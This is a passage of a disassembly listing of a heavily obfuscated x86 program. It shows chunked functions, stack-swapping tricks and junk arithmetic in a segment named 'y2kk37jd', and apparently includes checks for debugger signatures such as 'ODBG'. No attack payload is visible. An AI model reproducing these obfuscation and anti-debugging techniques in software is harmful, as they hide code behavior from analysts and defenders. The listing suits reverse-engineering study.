		mov	ebx, edi
		xchg	ebx, [esp+4+var_4]
		push	edx
		pop	edi
		xchg	edi, [esp+4+var_4]
		jmp	loc_43EBB8
sub_452884	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_159. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45919E

loc_452898:				; CODE XREF: sub_45919E+6j
		jmp	loc_44ACE2
; END OF FUNCTION CHUNK	FOR sub_45919E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E25A

loc_45289D:				; CODE XREF: sub_43E25A+186E4j
		jmp	loc_441A26
; END OF FUNCTION CHUNK	FOR sub_43E25A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_4528A2:				; CODE XREF: sub_4429DD+CB0Ej
		jmp	loc_44D4BB
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_4528A7:				; CODE XREF: sub_4518C3-4E7Aj
		jmp	loc_43E8A4
; END OF FUNCTION CHUNK	FOR sub_4518C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442081

loc_4528AC:				; CODE XREF: sub_442081:loc_44DDC8j
		xor	edx, 608C040Ah
		add	edx, ebp
		add	edx, 9A9E1B3Eh
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_458C75
		jmp	loc_4510F5
; END OF FUNCTION CHUNK	FOR sub_442081
; ---------------------------------------------------------------------------
		xchg	ebx, [ebp+0]
		jmp	sub_456BAC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_377. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_4528D4:				; CODE XREF: sub_44CEAB+16j
		add	eax, [ebp-4]
		call	sub_441856
		cmp	eax, [ebp-8]
		jnz	loc_441845
		push	offset sub_44619E
		jmp	loc_43E48B
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4528EF:				; CODE XREF: sub_4448E2-5CDDj
		jbe	loc_44B703
		or	ebx, 8EC26225h
		add	eax, ecx
		jmp	loc_4552E3
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_452902:				; CODE XREF: sub_442EB4-5704j
		or	esi, 9791CEC3h
		mov	edx, 81C90681h
		jmp	loc_43F170
; END OF FUNCTION CHUNK	FOR sub_442EB4

; =============== S U B	R O U T	I N E =======================================



sub_452912	proc near		; CODE XREF: sub_45404Dj
					; DATA XREF: sub_43F8B8:loc_454043o
		xchg	eax, [esp+0]
		mov	edx, eax
		call	sub_4581BB
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		pop	eax
		jmp	sub_44E840
sub_452912	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A45E

loc_452928:				; CODE XREF: sub_45A45E:loc_442813j
		not	ebx
		jno	loc_45845D
		jmp	loc_44F295
; END OF FUNCTION CHUNK	FOR sub_45A45E

; =============== S U B	R O U T	I N E =======================================



sub_452935	proc near		; DATA XREF: y2kk37jd:loc_45528Ao
		push	3719ECAFh
		pop	eax
		sub	eax, 0E8D2F8B7h
		add	eax, 0B1FD1D18h
		push	offset sub_4433FE
		jmp	nullsub_472
sub_452935	endp

; ---------------------------------------------------------------------------

loc_452951:				; CODE XREF: y2kk37jd:loc_459AEBj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450857

loc_452952:				; CODE XREF: sub_450857+Dj
		jmp	loc_45BED3
; END OF FUNCTION CHUNK	FOR sub_450857
; ---------------------------------------------------------------------------

loc_452957:				; CODE XREF: y2kk37jd:0043D2E7j
		jmp	locret_44D966
; ---------------------------------------------------------------------------

loc_45295C:				; CODE XREF: y2kk37jd:loc_446233j
		mov	edx, ds:dword_44C23C
		or	edx, edx
		jnz	loc_44C233
		jmp	loc_43D061
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_45296F:				; CODE XREF: sub_440040+1C435j
		shr	ecx, 0Fh
		mov	esi, [ecx]
		popf
		jmp	loc_459B32
; END OF FUNCTION CHUNK	FOR sub_440040
; ---------------------------------------------------------------------------

loc_45297A:				; CODE XREF: y2kk37jd:loc_451DD7j
					; y2kk37jd:00456292j
		mov	[edi], ecx
		call	sub_449DFE

loc_452981:				; CODE XREF: y2kk37jd:00443958j
		jno	loc_44E5A9
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_452987:				; CODE XREF: sub_43F0A5+48A6j
		add	edx, 41B50C4Ch
		xchg	edx, [esp+0]
		jmp	loc_4559EB
; END OF FUNCTION CHUNK	FOR sub_43F0A5

; =============== S U B	R O U T	I N E =======================================



sub_452995	proc near		; DATA XREF: y2kk37jd:0043D508o

; FUNCTION CHUNK AT 0044BCBA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004511F4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454AB8 SIZE 00000008 BYTES

		or	eax, eax
		jnz	loc_454AB8
		jmp	loc_44BCBA
sub_452995	endp

; ---------------------------------------------------------------------------

locret_4529A2:				; CODE XREF: y2kk37jd:00451260j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_4529A3:				; CODE XREF: sub_4490B4+1379j
		jmp	loc_458C0A
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_4529A8:				; CODE XREF: sub_44A298+12498j
		push	offset sub_448686
		jmp	nullsub_444
; END OF FUNCTION CHUNK	FOR sub_44A298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455958

loc_4529B2:				; CODE XREF: sub_455958-2674j
		jl	loc_44568C
; END OF FUNCTION CHUNK	FOR sub_455958
; START	OF FUNCTION CHUNK FOR sub_44B79D

loc_4529B8:				; CODE XREF: sub_44B79D-2764j
		jmp	loc_45B6D9
; END OF FUNCTION CHUNK	FOR sub_44B79D
; ---------------------------------------------------------------------------
		sub	ebx, 3C03EEB6h
		sub	ebx, edx
		jmp	loc_445685
; ---------------------------------------------------------------------------

locret_4529CA:				; CODE XREF: y2kk37jd:loc_43EA6Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457026

loc_4529CB:				; CODE XREF: sub_457026+1j
		mov	ebp, esp
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+8+var_8]
		jmp	loc_459D04
; END OF FUNCTION CHUNK	FOR sub_457026

; =============== S U B	R O U T	I N E =======================================



sub_4529D8	proc near		; CODE XREF: y2kk37jd:loc_45716Fj
					; DATA XREF: sub_4408B9+168ACo
		pop	esi
		sub	eax, 9E689F11h
		ror	eax, 1Ch
sub_4529D8	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44C2AE

loc_4529E2:				; CODE XREF: sub_44C2AE:loc_4563B6j
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		call	sub_445BB5
		mov	eax, [esp+4+var_4]
		jmp	loc_45BFC5
; END OF FUNCTION CHUNK	FOR sub_44C2AE
; ---------------------------------------------------------------------------

loc_4529F5:				; CODE XREF: y2kk37jd:loc_441AEEj
		jz	loc_43CD99
		jmp	loc_457CFB
; ---------------------------------------------------------------------------

loc_452A00:				; CODE XREF: y2kk37jd:00443316j
		xor	edi, edx
		jo	loc_44B672
		sub	ebp, ebx
		sbb	eax, 0E39E7811h
		jmp	loc_44E462
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_452A15:				; CODE XREF: sub_43ED19:loc_43C47Fj
		jz	loc_449C82
		jmp	loc_4500D4
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_452A20	proc near		; DATA XREF: sub_45024B+CB0o
		xchg	edi, [esp+0]
		jmp	sub_45405E
sub_452A20	endp


; =============== S U B	R O U T	I N E =======================================



sub_452A28	proc near		; CODE XREF: sub_440337+6EE1p
					; y2kk37jd:004542D2j

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		xchg	ebp, [esp-4+arg_0]
		push	eax
		jmp	loc_45150B
sub_452A28	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_452A35:				; CODE XREF: sub_43ED19+Ej
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_4513C9
		jmp	loc_4427CA
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
		xor	esi, 203C4DB2h
		jmp	sub_43FBB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_452A54:				; CODE XREF: sub_43EF4F+7FCEj
		jnb	loc_45743E

loc_452A5A:				; CODE XREF: sub_43EF4F:loc_44974Cj
		push	0
		push	offset sub_43F5F8
		jmp	loc_43DBBF
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4598BE

loc_452A66:				; CODE XREF: sub_4598BE:loc_43C98Aj
		cmp	ds:byte_449C3C,	0
		jnz	loc_45948B
		lea	edx, [ebp-14h]
		mov	eax, offset dword_449C40
		call	sub_4581BB
		lea	eax, [ebp-14h]
		push	eax
		jmp	loc_458068
; END OF FUNCTION CHUNK	FOR sub_4598BE

; =============== S U B	R O U T	I N E =======================================



sub_452A89	proc near		; CODE XREF: y2kk37jd:00452069j
					; sub_4526B7+1p

; FUNCTION CHUNK AT 00454FEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C407 SIZE 00000011 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp-4], eax
		call	nullsub_11

loc_452A9A:				; CODE XREF: sub_457D5A:loc_456230j
		mov	eax, [ebp-4]
		jmp	loc_454FEE
sub_452A89	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_452AA2:				; CODE XREF: sub_44AC89-A20Cj
		jz	loc_445685
		jnb	loc_43F354

loc_452AAE:				; CODE XREF: sub_44AC89:loc_440A75j
		add	eax, 8850CAFDh
		add	eax, ebp
		jmp	loc_442D25
; END OF FUNCTION CHUNK	FOR sub_44AC89

; =============== S U B	R O U T	I N E =======================================



sub_452ABB	proc near		; CODE XREF: y2kk37jd:004427B1j
					; sub_4562BD:loc_44F4B8p
		xchg	edi, [esp+0]
		pop	edi
		add	edx, 23E3F521h
		call	sub_454DC9
sub_452ABB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_452ACA:				; CODE XREF: sub_4448E2+9853j
		jmp	loc_4433D5
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_452ACF:				; CODE XREF: sub_443BAF+1031j
		jmp	loc_452519
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
		shl	eax, 8
		xor	edi, 0A7DC9226h
		jmp	sub_444338
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_452AE2:				; CODE XREF: sub_4440AB+Aj
		jz	loc_44267A
		jmp	loc_43DB8F
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_452AED:				; CODE XREF: sub_44AAA1-B50Dj
		not	eax

loc_452AEF:				; CODE XREF: sub_44AAA1:loc_43F55Cj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44F3ED
		jmp	loc_45208F
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EDE5

loc_452B00:				; CODE XREF: sub_43EDE5:loc_43E6DCj
		and	eax, 86AAEAA5h
		add	eax, 0EC5C5D85h
		rol	eax, 0Dh
		add	eax, 1883919Dh
		add	eax, ebp
		add	eax, 137B3FFFh
		push	offset loc_442188
		jmp	nullsub_130
; END OF FUNCTION CHUNK	FOR sub_43EDE5
; ---------------------------------------------------------------------------

loc_452B27:				; CODE XREF: y2kk37jd:0045C4FDj
		add	ebx, ecx
		shl	ebx, 7
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_452B2C:				; CODE XREF: sub_43F75D:loc_446088j
		sub	ecx, 0FF89CA4Ah
		call	sub_45C21C
		ja	loc_44E72B
		jmp	sub_4444CA
; END OF FUNCTION CHUNK	FOR sub_43F75D

; =============== S U B	R O U T	I N E =======================================



sub_452B42	proc near		; DATA XREF: sub_457FCC+1o

; FUNCTION CHUNK AT 00444B74 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00448EF7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454AC1 SIZE 00000005 BYTES

		push	eax
		pop	ebp
		xchg	ebp, [esp+0]
		push	ecx
		push	0BDEDE8EAh
		pop	ecx
		add	ecx, 0A4855EEAh
		test	ecx, 1000h
		jmp	loc_454AC1
sub_452B42	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_452B5F:				; CODE XREF: sub_445226:loc_4452DAj
		jz	loc_44DE34
		jmp	loc_4406B3
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_421. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_452B6B:				; CODE XREF: y2kk37jd:004463CAj
		jmp	locret_45846B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_452B70:				; CODE XREF: sub_43C46D+43Fj
		jmp	loc_43D65C
; END OF FUNCTION CHUNK	FOR sub_43C46D

; =============== S U B	R O U T	I N E =======================================



sub_452B75	proc near		; DATA XREF: sub_452C0C-13BC1o

; FUNCTION CHUNK AT 0044E5D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451F02 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045A566 SIZE 0000000B BYTES

		jnz	loc_451F02
		push	offset loc_451EEB

loc_452B80:				; CODE XREF: y2kk37jd:0043FC44j
		jmp	loc_44E5D6
sub_452B75	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	esi, 8B319B33h

loc_452B8B:				; CODE XREF: y2kk37jd:0043F8ACj
		sub	ebx, edi
		jmp	sub_44CB51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_452B92:				; CODE XREF: sub_445787:loc_449EA3j
		xor	eax, 0F04FBC46h
		jns	loc_45130A

loc_452B9E:				; CODE XREF: sub_45A961-12A88j
		jmp	loc_456E5D
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
		sub	ebp, ebx
		and	edx, edi
		jmp	loc_45130A
; ---------------------------------------------------------------------------
		test	eax, ebp
		jmp	loc_453B32
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C6ED

loc_452BB3:				; CODE XREF: sub_45C6ED-194B4j
		xor	ebp, edi

loc_452BB5:				; CODE XREF: sub_45C6ED:loc_4406BDj
		call	sub_447977
		mov	edx, 9E99B23Eh
		push	ebp
; END OF FUNCTION CHUNK	FOR sub_45C6ED
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_452BC0:				; CODE XREF: sub_43F911:loc_44DE2Ej
		mov	ebp, ecx
		xchg	ebp, [esp-4+arg_0]
		push	0CEC05C14h
		jmp	loc_454C01
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_452BCF:				; CODE XREF: sub_44CEAB+1265j
		and	ebp, edi
		test	ecx, ebp
		jmp	loc_43DD23
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_452BD8:				; CODE XREF: sub_45136B:loc_452102j
		pop	edx
		and	edx, 0FD62906Bh
		xor	edx, 0D7ED2C60h
		and	edx, 0FB17C4B1h
		or	edx, 0D143DD19h
		test	edx, 800h
		jmp	loc_458166
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_452BFC:				; CODE XREF: sub_43BD3D-8C0j
		push	edx
		call	sub_441718
		call	sub_43E389
; END OF FUNCTION CHUNK	FOR sub_43BD3D
; START	OF FUNCTION CHUNK FOR sub_4545C0

loc_452C07:				; CODE XREF: sub_4545C0-16720j
		jmp	nullsub_145
; END OF FUNCTION CHUNK	FOR sub_4545C0

; =============== S U B	R O U T	I N E =======================================



sub_452C0C	proc near		; DATA XREF: sub_445226:loc_451CAEo

; FUNCTION CHUNK AT 0043C44D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F047 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443C42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454578 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B475 SIZE 0000001B BYTES

		mov	eax, [ebp+8]
		cmp	dword ptr [eax-14h], 4
		jnz	loc_454578
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-4], 4
		jnz	loc_454578
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_43F047
		jmp	loc_45B475
sub_452C0C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_452C35:				; CODE XREF: sub_446718:loc_447AF4j
		mov	ds:off_41E0F8, eax
		call	sub_44CC02

loc_452C40:				; CODE XREF: sub_451FCB+Aj
		jmp	loc_4437F2
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448718

loc_452C45:				; CODE XREF: sub_448718+Cj
		jmp	sub_44D1D4
; END OF FUNCTION CHUNK	FOR sub_448718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BB55

loc_452C4A:				; CODE XREF: sub_43BB55+15j
		jmp	loc_459F41
; END OF FUNCTION CHUNK	FOR sub_43BB55

; =============== S U B	R O U T	I N E =======================================



sub_452C4F	proc near		; CODE XREF: sub_43B0F5:loc_43F231p
					; y2kk37jd:00455A74j
		xchg	eax, [esp+0]
		pop	eax
		cmp	byte ptr [eax],	0
		jnz	loc_44EC3C
		mov	eax, [ebp-8]
		shl	eax, 3
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		jmp	loc_4518CB
sub_452C4F	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_505. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_452C6E:				; CODE XREF: sub_43D41D+14C57j
		jmp	loc_43FED7
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_452C73:				; CODE XREF: sub_4552EB-C084j
		jmp	loc_4531EC
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_452C78:				; CODE XREF: sub_445226+254j
					; sub_44610D:loc_45A1A5j
		add	eax, 403F9868h
		call	sub_45A632

loc_452C83:				; CODE XREF: sub_457357+3j
		jmp	sub_459A7D
; END OF FUNCTION CHUNK	FOR sub_44610D

; =============== S U B	R O U T	I N E =======================================



sub_452C88	proc near		; CODE XREF: y2kk37jd:0044AD28j
					; sub_457DD3:loc_457DDAp

var_4		= dword	ptr -4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00441B0A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AC31 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004546B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004572F6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045A70A SIZE 0000000B BYTES

		xchg	ebx, [esp+4+var_4]
		pop	ebx
		push	0B0D82E02h
		pop	edi
		xor	edi, 7D6BEE98h
		jmp	loc_4546B6
sub_452C88	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_452C9E:				; CODE XREF: sub_456809+14j
		jmp	loc_4547F5
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4532F4

loc_452CA3:				; CODE XREF: sub_4532F4+11j
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-0Ch], 4
		jnz	loc_452CB9
		add	dword ptr [ebp-8], 4
		jmp	loc_4406D6
; ---------------------------------------------------------------------------

loc_452CB9:				; CODE XREF: sub_4532F4-64Aj
		add	dword ptr [ebp-8], 2
		jmp	loc_44177C
; END OF FUNCTION CHUNK	FOR sub_4532F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_452CC2:				; CODE XREF: sub_43B765+2928j
		jnb	loc_43D591
		mov	[ecx], edx

loc_452CCA:				; CODE XREF: sub_43B765:loc_441BB4j
		lea	eax, [ebp-25Ch]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44D915
		jmp	loc_4470A1
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453A10

loc_452CE1:				; CODE XREF: sub_453A10:loc_45C5C0j
		mov	[eax], edx
; END OF FUNCTION CHUNK	FOR sub_453A10
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_452CE3:				; CODE XREF: sub_43C851+9j
		jz	loc_442E44
		mov	eax, [ebp-24h]
		test	byte ptr [eax+1], 80h
		jnz	loc_44C1C8
		jmp	loc_4436E2
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_452CFB	proc near		; DATA XREF: sub_44E840+4751o
		xchg	edi, [esp+0]
		mov	ebx, edi
		pop	edi
sub_452CFB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_451A35

loc_452D01:				; CODE XREF: sub_451A35-B3C9j
					; y2kk37jd:004476E3j
		xchg	eax, edx
		jmp	loc_447D6A
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44884D

loc_452D07:				; CODE XREF: sub_44884D+26C1j
		rol	ebx, 1Dh

loc_452D0A:				; CODE XREF: sub_44884D:loc_44AF06j
		or	ebx, 721D3914h
		add	ebx, 8D64A3C3h
		mov	[ebx], eax
		jmp	loc_43D403
; END OF FUNCTION CHUNK	FOR sub_44884D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_452D1D:				; CODE XREF: sub_445226+7CB0j
					; sub_445226:loc_455373j
		call	sub_45833C
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_452D22:				; CODE XREF: sub_43C054:loc_4431A4j
		mov	esp, ebp
		xchg	edi, [esp-10h+arg_C]
		mov	ebp, edi
		pop	edi
		jmp	nullsub_271
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_452D2F:				; CODE XREF: sub_43F346:loc_44D671j
		and	esi, 65ED5246h
		cmp	esi, 0FAA8EF69h
		jmp	loc_45087A
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_452D40:				; CODE XREF: sub_443BAF:loc_44A293j
		or	eax, eax
		jnz	loc_4462D1
		jmp	loc_441990
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_452D4D:				; CODE XREF: sub_457A46:loc_45C083j
		push	778703C4h
		sbb	edx, edi
		jmp	loc_441523
; END OF FUNCTION CHUNK	FOR sub_457A46

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_452D59	proc near		; CODE XREF: sub_453583:loc_453789j
		retn
sub_452D59	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_452D5A:				; CODE XREF: sub_4448E2+17BCAj
		jmp	loc_44CAEC
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_452D5F:				; CODE XREF: sub_44F3F5:loc_43B81Fj
		jmp	nullsub_181
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448AAA

loc_452D64:				; CODE XREF: sub_448AAA+19j
		pop	eax
		or	eax, 53BC8834h
		xor	eax, 31EF71CBh
		add	eax, 32321EE5h
		xchg	eax, [esp-4+arg_0]
		jmp	loc_44C98E
; END OF FUNCTION CHUNK	FOR sub_448AAA
; ---------------------------------------------------------------------------
		push	0D0791540h
		pop	eax
		rol	eax, 4
		sub	eax, 6F838135h
		or	eax, 2DBCC896h
		and	eax, 26D763B4h
		jmp	loc_441207
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B26

loc_452D9F:				; CODE XREF: sub_442B26+907Fj
		add	ebx, 1175137Ch
		xchg	ebx, [esp+4+var_4]
		jmp	loc_44E8D8
; END OF FUNCTION CHUNK	FOR sub_442B26
; ---------------------------------------------------------------------------
		shl	edx, 18h
		sub	edi, ecx
		jmp	sub_446CC2
; ---------------------------------------------------------------------------
		xchg	ebp, [ebx]
		jmp	sub_43C9E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_452DBE:				; CODE XREF: sub_44001E:loc_459A16j
		add	eax, 0C550EA58h
		push	esi
		push	offset sub_45A8E1
		jmp	nullsub_298
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_452DCF:				; CODE XREF: sub_445568:loc_44DA4Aj
		mov	esi, ebp
		pop	ebp
		xor	esi, 435896AAh
		sub	esi, 42FCFD79h
		add	esi, 0E5179AC9h
		jmp	loc_43BB34
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------

loc_452DE9:				; CODE XREF: y2kk37jd:00459D34j
		ja	loc_4443B3
		xchg	eax, [edi]

; =============== S U B	R O U T	I N E =======================================



sub_452DF1	proc near		; CODE XREF: sub_44113A+12B9Ap
		xchg	edi, [esp+0]
		pop	edi
		jmp	sub_449734
sub_452DF1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_452DFA:				; CODE XREF: sub_44AAA1+4E5j
		jo	loc_43E021
		add	ebp, 3A934E47h
		shr	eax, 0Eh
		or	eax, ebp
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_452E0B:				; CODE XREF: sub_442EB4:loc_43D7AAj
					; sub_442EB4-3D3Ej ...
		jmp	loc_44C033
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------
		jmp	loc_44F3ED
; ---------------------------------------------------------------------------

loc_452E15:				; DATA XREF: sub_4448E2+28D2o
		cmp	dword ptr [eax], 47424454h
		jz	loc_44D915
		jmp	loc_43CA56
; ---------------------------------------------------------------------------

loc_452E26:				; CODE XREF: y2kk37jd:loc_44642Fj
					; y2kk37jd:0044E85Ej
		pushf
		mov	esi, 0D8D1836Fh
		jmp	loc_452F89
; ---------------------------------------------------------------------------

loc_452E31:				; DATA XREF: y2kk37jd:0044BD15o
		mov	dword ptr [ebp-4], 1
		mov	eax, 0
		or	eax, eax
		jz	loc_45C160
		jmp	loc_45557A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4537EF

loc_452E4A:				; CODE XREF: sub_4537EF+16j
		xchg	esi, [esp+0]
		jmp	sub_45C4C8
; END OF FUNCTION CHUNK	FOR sub_4537EF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_314. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_452E53:				; CODE XREF: sub_4514DE-9F10j
		jmp	loc_45B024
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45593D

loc_452E58:				; CODE XREF: sub_45593D-19C67j
					; y2kk37jd:loc_45592Bj
		xor	eax, eax
		mov	[ebp+var_8], eax
		jmp	loc_43BCE3
; END OF FUNCTION CHUNK	FOR sub_45593D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_452E62:				; CODE XREF: sub_44D302+8B50j
		test	byte ptr [ebp-8], 8
		jz	loc_4441E9
		push	ebp
		jmp	loc_44F096
